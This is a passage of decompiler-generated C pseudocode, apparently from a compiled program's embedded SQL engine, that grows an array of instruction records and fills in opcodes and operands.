									_t2251 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1717 + _t1717 * 4 << 2);
									_t2278 = _t2278 + 0xc;
									if(_t2251 != 0) {
										_t2048 =  *_t1979;
										if(_t2048 == 0 || _t2251 <  *((intOrPtr*)(_t2048 + 0xe8)) || _t2251 >=  *((intOrPtr*)(_t2048 + 0xec))) {
											_t1721 =  *0x48182c(_t2251);
											_t2278 = _t2278 + 4;
											_t2049 = _t1721;
										} else {
											_t2049 =  *(_t2048 + 0xd8) & 0x0000ffff;
										}
										 *(_t1979 + 0x10) = 0xcccccccd * _t2049 >> 0x20 >> 4;
										 *((intOrPtr*)(_t1979 + 0x14)) = _t2251;
										goto L351;
									}
								}
								_t2217 =  *(_t1979 + 0xc);
								_t1708 =  *(_t1979 + 0x10);
								if(_t1708 > _t2217) {
									L363:
									_t1709 =  *((intOrPtr*)(_t1979 + 0x14));
									 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
									_t2045 = _t2217 + _t2217 * 4;
									_t2205 = _v56;
									 *((short*)(_t1709 + _t2045 * 4)) = 0x60;
									 *((char*)(_t1709 + 3 + _t2045 * 4)) = 0;
									 *(_t1709 + 4 + _t2045 * 4) = 0;
									 *(_t1709 + 8 + _t2045 * 4) = _t2205;
									 *(_t1709 + 0xc + _t2045 * 4) = 0;
									 *(_t1709 + 0x10 + _t2045 * 4) = 0;
									 *((char*)(_t1979 + 0x6e)) = 0;
								} else {
									if(_t1708 == 0) {
										_t1710 = 0x33;
									} else {
										_t1710 = _t1708 + _t1708;
									}
									_t2250 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1710 + _t1710 * 4 << 2);
									_t2278 = _t2278 + 0xc;
									if(_t2250 == 0) {
										_t2205 = _v56;
									} else {
										_t2046 =  *_t1979;
										if(_t2046 == 0 || _t2250 <  *((intOrPtr*)(_t2046 + 0xe8)) || _t2250 >=  *((intOrPtr*)(_t2046 + 0xec))) {
											_t1714 =  *0x48182c(_t2250);
											_t2278 = _t2278 + 4;
											_t2047 = _t1714;
										} else {
											_t2047 =  *(_t2046 + 0xd8) & 0x0000ffff;
										}
										 *(_t1979 + 0x10) = 0xcccccccd * _t2047 >> 0x20 >> 4;
										 *((intOrPtr*)(_t1979 + 0x14)) = _t2250;
										goto L363;
									}
								}
							}
							if(_v100 != 0x73) {
								_t2103 =  *(_t1979 + 0xc);
								_t1571 =  *(_t1979 + 0x10);
								_v72 = _t2103;
								if(_t1571 > _t2103) {
									L391:
									 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
									_t1572 =  *((intOrPtr*)(_t1979 + 0x14));
									_t2001 = _t2103 + _t2103 * 4;
									 *((intOrPtr*)(_t1572 + 4 + _t2001 * 4)) = _v88 + 1;
									 *((short*)(_t1572 + _t2001 * 4)) = 0xb;
									 *((char*)(_t1572 + 3 + _t2001 * 4)) = 0;
									 *((intOrPtr*)(_t1572 + 8 + _t2001 * 4)) = _v96;
									 *(_t1572 + 0xc + _t2001 * 4) = 0;
									 *(_t1572 + 0x10 + _t2001 * 4) = 0;
									 *((char*)(_t1979 + 0x6e)) = 0;
								} else {
									if(_t1571 == 0) {
										_t1688 = 0x33;
									} else {
										_t1688 = _t1571 + _t1571;
									}
									_t2248 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1688 + _t1688 * 4 << 2);
									_t2278 = _t2278 + 0xc;
									if(_t2248 == 0) {
										_v72 = 1;
									} else {
										_t2038 =  *_t1979;
										if(_t2038 == 0 || _t2248 <  *((intOrPtr*)(_t2038 + 0xe8)) || _t2248 >=  *((intOrPtr*)(_t2038 + 0xec))) {
											_t1692 =  *0x48182c(_t2248);
											_t2278 = _t2278 + 4;
											_t2039 = _t1692;
										} else {
											_t2039 =  *(_t2038 + 0xd8) & 0x0000ffff;
										}
										 *(_t1979 + 0x10) = 0xcccccccd * _t2039 >> 0x20 >> 4;
										_t2103 = _v72;
										 *((intOrPtr*)(_t1979 + 0x14)) = _t2248;
										goto L391;
									}
								}
								_t2206 =  *(_t1979 + 0xc);
								_t1573 =  *(_t1979 + 0x10);
								if(_t1573 > _t2206) {
									L404:
									 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
									_t1574 =  *((intOrPtr*)(_t1979 + 0x14));
									_t2002 = _t2206 + _t2206 * 4;
									 *((intOrPtr*)(_t1574 + 4 + _t2002 * 4)) = _v44 + 2;
									 *((short*)(_t1574 + _t2002 * 4)) = 0x2f;
									 *((char*)(_t1574 + 3 + _t2002 * 4)) = 0;
									 *((intOrPtr*)(_t1574 + 8 + _t2002 * 4)) = _v80;
									 *(_t1574 + 0xc + _t2002 * 4) = 0;
									 *(_t1574 + 0x10 + _t2002 * 4) = 0;
									 *((char*)(_t1979 + 0x6e)) = 0;
								} else {
									if(_t1573 == 0) {
										_t1681 = 0x33;
									} else {
										_t1681 = _t1573 + _t1573;
									}
									_t2247 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1681 + _t1681 * 4 << 2);
									_t2278 = _t2278 + 0xc;
									if(_t2247 != 0) {
										_t2036 =  *_t1979;
										if(_t2036 == 0 || _t2247 <  *((intOrPtr*)(_t2036 + 0xe8)) || _t2247 >=  *((intOrPtr*)(_t2036 + 0xec))) {
											_t1685 =  *0x48182c(_t2247);
											_t2278 = _t2278 + 4;
											_t2037 = _t1685;
										} else {
											_t2037 =  *(_t2036 + 0xd8) & 0x0000ffff;
										}
										 *(_t1979 + 0x10) = 0xcccccccd * _t2037 >> 0x20 >> 4;
										 *((intOrPtr*)(_t1979 + 0x14)) = _t2247;
										goto L404;
									}
								}
								_t2207 =  *(_t1979 + 0xc);
								_t1575 =  *(_t1979 + 0x10);
								if(_t1575 > _t2207) {
									L416:
									_t1576 =  *((intOrPtr*)(_t1979 + 0x14));
									 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
									_t2003 = _t2207 + _t2207 * 4;
									 *((short*)(_t1576 + _t2003 * 4)) = 0x3c;
									 *((char*)(_t1576 + 3 + _t2003 * 4)) = 0;
									 *((intOrPtr*)(_t1576 + 4 + _t2003 * 4)) = _v88;
									 *(_t1576 + 8 + _t2003 * 4) = 0;
									 *(_t1576 + 0xc + _t2003 * 4) = 0;
									 *(_t1576 + 0x10 + _t2003 * 4) = 0;
									 *((char*)(_t1979 + 0x6e)) = 0;
								} else {
									if(_t1575 == 0) {
										_t1674 = 0x33;
									} else {
										_t1674 = _t1575 + _t1575;
									}
									_t2246 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1674 + _t1674 * 4 << 2);
									_t2278 = _t2278 + 0xc;
									if(_t2246 != 0) {
										_t2034 =  *_t1979;
										if(_t2034 == 0 || _t2246 <  *((intOrPtr*)(_t2034 + 0xe8)) || _t2246 >=  *((intOrPtr*)(_t2034 + 0xec))) {
											_t1678 =  *0x48182c(_t2246);
											_t2278 = _t2278 + 4;
											_t2035 = _t1678;
										} else {
											_t2035 =  *(_t2034 + 0xd8) & 0x0000ffff;
										}
										 *(_t1979 + 0x10) = 0xcccccccd * _t2035 >> 0x20 >> 4;
										 *((intOrPtr*)(_t1979 + 0x14)) = _t2246;
										goto L416;
									}
								}
								_t2208 =  *(_t1979 + 0xc);
								_t1577 =  *(_t1979 + 0x10);
								if(_t1577 > _t2208) {
									L428:
									_t1578 =  *((intOrPtr*)(_t1979 + 0x14));
									 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
									_t2004 = _t2208 + _t2208 * 4;
									 *((short*)(_t1578 + _t2004 * 4)) = 0x60;
									 *((char*)(_t1578 + 3 + _t2004 * 4)) = 0;
									 *(_t1578 + 4 + _t2004 * 4) = 0;
									 *((intOrPtr*)(_t1578 + 8 + _t2004 * 4)) = _v72;
									 *(_t1578 + 0xc + _t2004 * 4) = 0;
									 *(_t1578 + 0x10 + _t2004 * 4) = 0;
									 *((char*)(_t1979 + 0x6e)) = 0;
								} else {
									if(_t1577 == 0) {
										_t1667 = 0x33;
									} else {
										_t1667 = _t1577 + _t1577;
									}
									_t2245 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1667 + _t1667 * 4 << 2);
									_t2278 = _t2278 + 0xc;
									if(_t2245 != 0) {
										_t2032 =  *_t1979;
										if(_t2032 == 0 || _t2245 <  *((intOrPtr*)(_t2032 + 0xe8)) || _t2245 >=  *((intOrPtr*)(_t2032 + 0xec))) {
											_t1671 =  *0x48182c(_t2245);
											_t2278 = _t2278 + 4;
											_t2033 = _t1671;
										} else {
											_t2033 =  *(_t2032 + 0xd8) & 0x0000ffff;
										}
										 *(_t1979 + 0x10) = 0xcccccccd * _t2033 >> 0x20 >> 4;
										 *((intOrPtr*)(_t1979 + 0x14)) = _t2245;
										goto L428;
									}
								}
							} else {
								_v72 = _t2205;
							}
							_t2112 =  *(_t1979 + 0xc);
							_t1579 =  *(_t1979 + 0x10);
							_v52 = _t2112;
							if(_t1579 > _t2112) {
								L440:
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t1580 =  *((intOrPtr*)(_t1979 + 0x14));
								_t2005 = _t2112 + _t2112 * 4;
								 *((intOrPtr*)(_t1580 + 4 + _t2005 * 4)) = _v44 + 2;
								 *((short*)(_t1580 + _t2005 * 4)) = 0x2f;
								 *((char*)(_t1580 + 3 + _t2005 * 4)) = 0;
								 *((intOrPtr*)(_t1580 + 8 + _t2005 * 4)) = _v80;
								 *(_t1580 + 0xc + _t2005 * 4) = 0;
								 *(_t1580 + 0x10 + _t2005 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								if(_t1579 == 0) {
									_t1660 = 0x33;
								} else {
									_t1660 = _t1579 + _t1579;
								}
								_t2244 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1660 + _t1660 * 4 << 2);
								_t2278 = _t2278 + 0xc;
								if(_t2244 == 0) {
									_v52 = 1;
								} else {
									_t2030 =  *_t1979;
									if(_t2030 == 0 || _t2244 <  *((intOrPtr*)(_t2030 + 0xe8)) || _t2244 >=  *((intOrPtr*)(_t2030 + 0xec))) {
										_t1664 =  *0x48182c(_t2244);
										_t2278 = _t2278 + 4;
										_t2031 = _t1664;
									} else {
										_t2031 =  *(_t2030 + 0xd8) & 0x0000ffff;
									}
									 *(_t1979 + 0x10) = 0xcccccccd * _t2031 >> 0x20 >> 4;
									_t2112 = _v52;
									 *((intOrPtr*)(_t1979 + 0x14)) = _t2244;
									goto L440;
								}
							}
							_t2209 =  *(_t1979 + 0xc);
							_t1581 =  *(_t1979 + 0x10);
							if(_t1581 > _t2209) {
								L453:
								_t1582 =  *((intOrPtr*)(_t1979 + 0x14));
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t2006 = _t2209 + _t2209 * 4;
								 *((short*)(_t1582 + _t2006 * 4)) = 0x3c;
								 *((char*)(_t1582 + 3 + _t2006 * 4)) = 0;
								 *((intOrPtr*)(_t1582 + 4 + _t2006 * 4)) = _v88;
								 *(_t1582 + 8 + _t2006 * 4) = 0;
								 *(_t1582 + 0xc + _t2006 * 4) = 0;
								 *(_t1582 + 0x10 + _t2006 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								if(_t1581 == 0) {
									_t1653 = 0x33;
								} else {
									_t1653 = _t1581 + _t1581;
								}
								_t2243 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1653 + _t1653 * 4 << 2);
								_t2278 = _t2278 + 0xc;
								if(_t2243 != 0) {
									_t2028 =  *_t1979;
									if(_t2028 == 0 || _t2243 <  *((intOrPtr*)(_t2028 + 0xe8)) || _t2243 >=  *((intOrPtr*)(_t2028 + 0xec))) {
										_t1657 =  *0x48182c(_t2243);
										_t2278 = _t2278 + 4;
										_t2029 = _t1657;
									} else {
										_t2029 =  *(_t2028 + 0xd8) & 0x0000ffff;
									}
									 *(_t1979 + 0x10) = 0xcccccccd * _t2029 >> 0x20 >> 4;
									 *((intOrPtr*)(_t1979 + 0x14)) = _t2243;
									goto L453;
								}
							}
							_t2210 =  *(_t1979 + 0xc);
							_t1583 =  *(_t1979 + 0x10);
							if(_t1583 > _t2210) {
								L465:
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t1584 =  *((intOrPtr*)(_t1979 + 0x14));
								_t2007 = _t2210 + _t2210 * 4;
								 *((intOrPtr*)(_t1584 + 4 + _t2007 * 4)) = _v88 + 1;
								 *((short*)(_t1584 + _t2007 * 4)) = 0xb;
								 *((char*)(_t1584 + 3 + _t2007 * 4)) = 0;
								 *((intOrPtr*)(_t1584 + 8 + _t2007 * 4)) = _v56;
								 *(_t1584 + 0xc + _t2007 * 4) = 0;
								 *(_t1584 + 0x10 + _t2007 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								if(_t1583 == 0) {
									_t1646 = 0x33;
								} else {
									_t1646 = _t1583 + _t1583;
								}
								_t2242 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1646 + _t1646 * 4 << 2);
								_t2278 = _t2278 + 0xc;
								if(_t2242 != 0) {
									_t2026 =  *_t1979;
									if(_t2026 == 0 || _t2242 <  *((intOrPtr*)(_t2026 + 0xe8)) || _t2242 >=  *((intOrPtr*)(_t2026 + 0xec))) {
										_t1650 =  *0x48182c(_t2242);
										_t2278 = _t2278 + 4;
										_t2027 = _t1650;
									} else {
										_t2027 =  *(_t2026 + 0xd8) & 0x0000ffff;
									}
									 *(_t1979 + 0x10) = 0xcccccccd * _t2027 >> 0x20 >> 4;
									 *((intOrPtr*)(_t1979 + 0x14)) = _t2242;
									goto L465;
								}
							}
							_t2211 =  *(_t1979 + 0xc);
							_t1585 =  *(_t1979 + 0x10);
							if(_t1585 > _t2211) {
								L477:
								_t1586 =  *((intOrPtr*)(_t1979 + 0x14));
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t2008 = _t2211 + _t2211 * 4;
								 *((short*)(_t1586 + _t2008 * 4)) = 0x60;
								 *((char*)(_t1586 + 3 + _t2008 * 4)) = 0;
								 *(_t1586 + 4 + _t2008 * 4) = 0;
								 *((intOrPtr*)(_t1586 + 8 + _t2008 * 4)) = _v116;
								 *(_t1586 + 0xc + _t2008 * 4) = 0;
								 *(_t1586 + 0x10 + _t2008 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								if(_t1585 == 0) {
									_t1639 = 0x33;
								} else {
									_t1639 = _t1585 + _t1585;
								}
								_t2241 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1639 + _t1639 * 4 << 2);
								_t2278 = _t2278 + 0xc;
								if(_t2241 != 0) {
									_t2024 =  *_t1979;
									if(_t2024 == 0 || _t2241 <  *((intOrPtr*)(_t2024 + 0xe8)) || _t2241 >=  *((intOrPtr*)(_t2024 + 0xec))) {
										_t1643 =  *0x48182c(_t2241);
										_t2278 = _t2278 + 4;
										_t2025 = _t1643;
									} else {
										_t2025 =  *(_t2024 + 0xd8) & 0x0000ffff;
									}
									 *(_t1979 + 0x10) = 0xcccccccd * _t2025 >> 0x20 >> 4;
									 *((intOrPtr*)(_t1979 + 0x14)) = _t2241;
									goto L477;
								}
							}
							_t1587 = _v100;
							if(_t1587 != 0x71) {
								if(_t1587 != 0x73) {
									_t2212 = E00FD64F7(_t1979, 0x3c, _v88);
									E00FD6567(_t1979, 0xb, _v88 + 1, _v56);
									_t2234 =  *(_t1979 + 0xc);
									_t2278 = _t2278 + 0x1c;
									if( *(_t1979 + 0x10) > _t2234) {
										L484:
										_t1591 =  *((intOrPtr*)(_t1979 + 0x14));
										 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
										_t2009 = _t2234 + _t2234 * 4;
										 *((short*)(_t1591 + _t2009 * 4)) = 0x60;
										 *((char*)(_t1591 + 3 + _t2009 * 4)) = 0;
										 *(_t1591 + 4 + _t2009 * 4) = 0;
										 *((intOrPtr*)(_t1591 + 8 + _t2009 * 4)) = _v116;
										 *(_t1591 + 0xc + _t2009 * 4) = 0;
										 *(_t1591 + 0x10 + _t2009 * 4) = 0;
										 *((char*)(_t1979 + 0x6e)) = 0;
									} else {
										_t1636 = E00FA96F7(_t1979);
										_t2278 = _t2278 + 4;
										if(_t1636 == 0) {
											goto L484;
										}
									}
								} else {
									_t1637 = _v52;
									_t2212 = _t1637;
									_v52 = _t1637 + 1;
								}
							} else {
								_t2212 = _v52;
							}
							_v80 =  *(_t1979 + 0xc);
							_t1593 = _v100;
							if(_t1593 == 0x71 || _t1593 == 0x70) {
								E00FD6567(_t1979, 0x2f, _v108, _v124);
								_t2278 = _t2278 + 0x10;
							}
							E00FD64F7(_t1979, 0x3c, _v44);
							_t2235 =  *(_t1979 + 0xc);
							_t2279 = _t2278 + 0xc;
							if( *(_t1979 + 0x10) > _t2235) {
								L490:
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t1596 =  *((intOrPtr*)(_t1979 + 0x14));
								_t2010 = _t2235 + _t2235 * 4;
								 *((intOrPtr*)(_t1596 + 4 + _t2010 * 4)) = _v44 + 1;
								 *((short*)(_t1596 + _t2010 * 4)) = 0xb;
								 *((char*)(_t1596 + 3 + _t2010 * 4)) = 0;
								 *((intOrPtr*)(_t1596 + 8 + _t2010 * 4)) = _v72;
								 *(_t1596 + 0xc + _t2010 * 4) = 0;
								 *(_t1596 + 0x10 + _t2010 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								_t1635 = E00FA96F7(_t1979);
								_t2279 = _t2279 + 4;
								if(_t1635 == 0) {
									goto L490;
								}
							}
							_t2236 =  *(_t1979 + 0xc);
							if( *(_t1979 + 0x10) > _t2236) {
								L493:
								_t1597 =  *((intOrPtr*)(_t1979 + 0x14));
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t2011 = _t2236 + _t2236 * 4;
								 *((short*)(_t1597 + _t2011 * 4)) = 0x60;
								 *((char*)(_t1597 + 3 + _t2011 * 4)) = 0;
								 *(_t1597 + 4 + _t2011 * 4) = 0;
								 *((intOrPtr*)(_t1597 + 8 + _t2011 * 4)) = _v116;
								 *(_t1597 + 0xc + _t2011 * 4) = 0;
								 *(_t1597 + 0x10 + _t2011 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								_t1634 = E00FA96F7(_t1979);
								_t2279 = _t2279 + 4;
								if(_t1634 == 0) {
									goto L493;
								}
							}
							_t2126 =  *(_t1979 + 0xc);
							_t1598 = _v48;
							if(_t2126 > _t1598) {
								 *( *((intOrPtr*)(_t1979 + 0x14)) + 8 + (_t1598 + _t1598 * 4) * 4) = _t2126;
							}
							_t2237 =  *(_t1979 + 0xc);
							if( *(_t1979 + 0x10) > _t2237) {
								L498:
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t1599 =  *((intOrPtr*)(_t1979 + 0x14));
								_t2012 = _t2237 + _t2237 * 4;
								 *((short*)(_t1599 + _t2012 * 4)) = 0x30;
								 *((char*)(_t1599 + 3 + _t2012 * 4)) = 0;
								 *(_t1599 + 4 + _t2012 * 4) = 0;
								 *((intOrPtr*)(_t1599 + 8 + _t2012 * 4)) = _v88 + 1;
								 *(_t1599 + 0xc + _t2012 * 4) = 0;
								 *(_t1599 + 0x10 + _t2012 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								_t1632 = E00FA96F7(_t1979);
								_t2279 = _t2279 + 4;
								if(_t1632 == 0) {
									goto L498;
								}
							}
							_t2238 =  *(_t1979 + 0xc);
							if( *(_t1979 + 0x10) > _t2238) {
								L501:
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t1600 =  *((intOrPtr*)(_t1979 + 0x14));
								_t2013 = _t2238 + _t2238 * 4;
								 *((short*)(_t1600 + _t2013 * 4)) = 0x30;
								 *((char*)(_t1600 + 3 + _t2013 * 4)) = 0;
								 *(_t1600 + 4 + _t2013 * 4) = 0;
								 *((intOrPtr*)(_t1600 + 8 + _t2013 * 4)) = _v44 + 1;
								 *(_t1600 + 0xc + _t2013 * 4) = 0;
								 *(_t1600 + 0x10 + _t2013 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								_t1631 = E00FA96F7(_t1979);
								_t2279 = _t2279 + 4;
								if(_t1631 == 0) {
									goto L501;
								}
							}
							E00FD6567(_t1979, 0x2f, _v88, _v132);
							E00FD6567(_t1979, 0x2f, _v44, _v128);
							E00FD6567(_t1979, 0xb, _v88 + 1, _v56);
							E00FD6567(_t1979, 0xb, _v44 + 1, _v72);
							_t2014 =  *((intOrPtr*)(_t1979 + 0x20));
							_t2280 = _t2279 + 0x40;
							if(_t2014 != 0) {
								 *(_t2014 - 4 + _v116 * 4) =  *(_t1979 + 0xc);
							}
							E00FD6647(_t1979, 0x85, 0, 0, 0, _v76, 0xfffffff1);
							E00FD6647(_t1979, 0x5f, _v32, _v16, _v84, _v92, 0xfffffff0);
							_t2240 =  *(_t1979 + 0xc);
							_t2281 = _t2280 + 0x38;
							if( *(_t1979 + 0x10) > _t2240) {
								L506:
								_t1611 =  *((intOrPtr*)(_t1979 + 0x14));
								 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
								_t2015 = _t2240 + _t2240 * 4;
								 *((intOrPtr*)(_t1611 + 4 + _t2015 * 4)) = _v52;
								 *((short*)(_t1611 + _t2015 * 4)) = 0x84;
								 *((char*)(_t1611 + 3 + _t2015 * 4)) = 0;
								 *((intOrPtr*)(_t1611 + 8 + _t2015 * 4)) = _t2212;
								 *((intOrPtr*)(_t1611 + 0xc + _t2015 * 4)) = _v80;
								 *(_t1611 + 0x10 + _t2015 * 4) = 0;
								 *((char*)(_t1979 + 0x6e)) = 0;
							} else {
								_t1627 = E00FA96F7(_t1979);
								_t2281 = _t2281 + 4;
								if(_t1627 == 0) {
									goto L506;
								}
							}
							_t2016 = _v68;
							_t2133 = _v60;
							if(_t2016 != 0) {
								_t1626 = _v84 + 1;
								if(_t1626 >  *((intOrPtr*)(_t2133 + 0x38))) {
									 *((intOrPtr*)(_t2133 + 0x38)) = _t1626;
									 *((intOrPtr*)(_t2133 + 0x3c)) = _t2016;
								}
							}
							_t2017 =  *((intOrPtr*)(_t1979 + 0x20));
							if(_t2017 != 0) {
								 *(_t2017 - 4 + _v96 * 4) =  *(_t1979 + 0xc);
							}
							if( *_v120 == 5) {
								_t1619 = _v104;
								_t2020 = _t1619;
								_t1620 =  *((intOrPtr*)(_t1619 + 0x1c));
								while(_t1620 != 0) {
									_t2020 = _t1620;
									_t1620 =  *((intOrPtr*)(_t1620 + 0x1c));
								}
								E00FA81C7(_t2133, 0,  *_t2020);
								_t2281 = _t2281 + 0xc;
							}
							_t1980 = _v64;
							_t2213 =  *((intOrPtr*)(_t1980 + 0x1c));
							if(_t2213 != 0) {
								_t2240 = _v112;
								E00FA1DA7(_t2240, _t2213);
								if(_t2240 == 0 || _t2213 <  *((intOrPtr*)(_t2240 + 0xe8)) || _t2213 >=  *((intOrPtr*)(_t2240 + 0xec))) {
									E00F97247(_t2213);
								} else {
									 *_t2213 =  *((intOrPtr*)(_t2240 + 0xe4));
									 *((intOrPtr*)(_t2240 + 0xdc)) =  *((intOrPtr*)(_t2240 + 0xdc)) - 1;
									 *((intOrPtr*)(_t2240 + 0xe4)) = _t2213;
								}
							}
							 *((intOrPtr*)(_t1980 + 0x1c)) = _v104;
							return E00FE72F2(0, _t1980, _v8 ^ _t2270, _t2133, _t2213, _t2240);
							goto L523;
						} else {
							_v76 = 0;
							L35:
							_v92 = 0;
						}
					}
					L36:
					_t2224 = _v64;
					 *((intOrPtr*)(_t2224 + 0x18)) = _v68;
					_t1525 = E00FC3147( *_v60, _v68, 0);
					_t2273 = _t2272 + 0xc;
					 *((intOrPtr*)(_v104 + 0x18)) = _t1525;
					if(_v100 != 0x71) {
						_t2225 = _v60;
						_t1527 =  *((intOrPtr*)( *_t2224));
						_v52 = _t1527;
						_t1990 = _t1527 + 1;
						_v68 =  *((intOrPtr*)(_t2225 + 0x3c));
						_t1529 =  *((intOrPtr*)(_t2225 + 0x38));
						_v108 = _t1990;
						_v48 = _t1529;
						if(_t1990 > _t1529) {
							L105:
							_t1530 =  *((intOrPtr*)(_t2225 + 0x48));
							_t2093 = _t1530 + 1;
							_v68 = _t1530 + 1;
							 *((intOrPtr*)(_t2225 + 0x48)) = _t1530 + _t1990;
						} else {
							_t2263 = 0;
							_t2079 = _v60 + 0x70;
							do {
								_t2187 =  *_t2079;
								_t2197 = _v112;
								if(_t2187 < _v68) {
									goto L102;
								} else {
									_t2197 = _v112;
									if(_t2187 <= _t1529 + _v68 - 1) {
										_t1990 = _v108;
										_t2225 = _v60;
										goto L105;
									} else {
										_t1529 = _v48;
										goto L102;
									}
								}
								goto L106;
								L102:
								_t2263 = _t2263 + 1;
								_t2079 = _t2079 + 0x18;
							} while (_t2263 < 0xa);
							_t2093 = _v60;
							 *((intOrPtr*)(_t2093 + 0x3c)) = _v68 + _v108;
							 *((intOrPtr*)(_t2093 + 0x38)) = _v48 - _v108;
						}
						L106:
						_t1991 =  *(_t1979 + 0xc);
						_t1532 =  *(_t1979 + 0x10);
						_v80 = _t1991;
						if(_t1532 > _t1991) {
							L117:
							_t1533 =  *((intOrPtr*)(_t1979 + 0x14));
							 *(_t1979 + 0xc) =  *(_t1979 + 0xc) + 1;
							_t2093 = _v68;
							_t1991 = _t1991 + _t1991 * 4;
							 *((short*)(_t1533 + _t1991 * 4)) = 0x30;
							 *((char*)(_t1533 + 3 + _t1991 * 4)) = 0;
							 *(_t1533 + 4 + _t1991 * 4) = 0;
							 *((intOrPtr*)(_t1533 + 8 + _t1991 * 4)) = _v68;
							 *(_t1533 + 0xc + _t1991 * 4) = 0;
							 *(_t1533 + 0x10 + _t1991 * 4) = 0;
							 *((char*)(_t1979 + 0x6e)) = 0;
						} else {
							if(_t1532 == 0) {
								_t1905 = 0x33;
							} else {
								_t1905 = _t1532 + _t1532;
							}
							_t2262 = E00FBE7D7( *_t1979,  *((intOrPtr*)(_t1979 + 0x14)), _t1905 + _t1905 * 4 << 2);
							_t2273 = _t2273 + 0xc;
							if(_t2262 != 0) {
								_t1909 =  *_t1979;
								if(_t1909 == 0 || _t2262 <  *((intOrPtr*)(_t1909 + 0xe8)) || _t2262 >=  *((intOrPtr*)(_t1909 + 0xec))) {
									_t1910 =  *0x48182c(_t2262);
									_t2273 = _t2273 + 4;
									_t2077 = _t1910;
								} else {
									_t2077 =  *(_t1909 + 0xd8) & 0x0000ffff;
								}
								_t1991 = _v80;
								 *(_t1979 + 0x10) = 0xcccccccd * _t2077 >> 0x20 >> 4;
								 *((intOrPtr*)(_t1979 + 0x14)) = _t2262;
								goto L117;
							}
						}
						_t1534 = _v52;
						_t2227 = _t1534 + (_t1534 + 4) * 4;
						if(_t2197 == 0) {
							L126:
							_t264 = _t2227 - 1; // -1
							if(_t264 > 0x7ffffefe) {
								_t2094 = 0;
								_v56 = 0;
								goto L138;
							} else {
								if( *0x481808 == 0) {
									_t1895 =  *0x481820(_t2227);
									_t2094 = _t1895;
									_v56 = _t1895;
									goto L134;
								} else {
									_t1896 =  *0x481910;
									if(_t1896 != 0) {
										 *0x481850(_t1896);
										_t2273 = _t2273 + 4;
									}
									E00FAB537(_t2093, _t2227,  &_v48);
									_t1899 =  *0x481910;
									_t2273 = _t2273 + 8;
									if(_t1899 == 0) {
										_t2094 = _v48;
										_v56 = _t2094;
									} else {
										 *0x481858(_t1899);
										_t2094 = _v48;
										_v56 = _t2094;
										L134:
										_t2273 = _t2273 + 4;
									}
								}
								if(_t2094 != 0) {
									goto L141;
								} else {
									L138:
									if(_t2197 != 0) {
										 *((char*)(_t2197 + 0x1e)) = 1;
									}
									goto L140;
								}
							}
							goto L142;
						} else {
							if( *((char*)(_t2197 + 0x1e)) == 0) {
								if( *((char*)(_t2197 + 0xda)) == 0 || _t2227 > ( *(_t2197 + 0xd8) & 0x0000ffff)) {
									goto L126;
								} else {
									_t2093 =  *(_t2197 + 0xe4);
									_v56 = _t2093;
									if(_t2093 == 0) {
										goto L126;
									} else {
										 *((intOrPtr*)(_t2197 + 0xdc)) =  *((intOrPtr*)(_t2197 + 0xdc)) + 1;
										 *(_t2197 + 0xe4) =  *_t2093;
										_t1904 =  *((intOrPtr*)(_t2197 + 0xdc));
										if(_t1904 >  *((intOrPtr*)(_t2197 + 0xe0))) {
											 *((intOrPtr*)(_t2197 + 0xe0)) = _t1904;
										}
										L140:
										if(_t2094 != 0) {
											L141:
											E00FE7C87(_t2094, 0, _t2227);
											_t2094 = _v56;
											_t2273 = _t2273 + 0xc;
										}
									}
								}
								L142:
								_t1534 = _v52;
							} else {
								_t2094 = 0;
								_v56 = 0;
							}
						}
						if(_t2094 != 0) {
							_t1991 = _v52;
							 *(_t2094 + 6) = _t1991;
							 *((intOrPtr*)(_t2094 + 8)) = _t2094 + (_t1534 + 3) * 4;
							_t2261 = 0;
							 *((char*)(_t2094 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t2197 + 8)) + 0xc)) + 0x39));
							if(_t1991 > 0) {
								_t284 = _t2094 + 0xc; // 0xc
								_t2218 = 0;
								_v48 = _t284;
								_t1981 = _t1991;
								do {
									_t1890 =  *((intOrPtr*)(_v64 + 0x1c));
									if( *((intOrPtr*)(_v64 + 0x1c)) == 0) {
										_t1891 = 0;
										goto L150;
									} else {
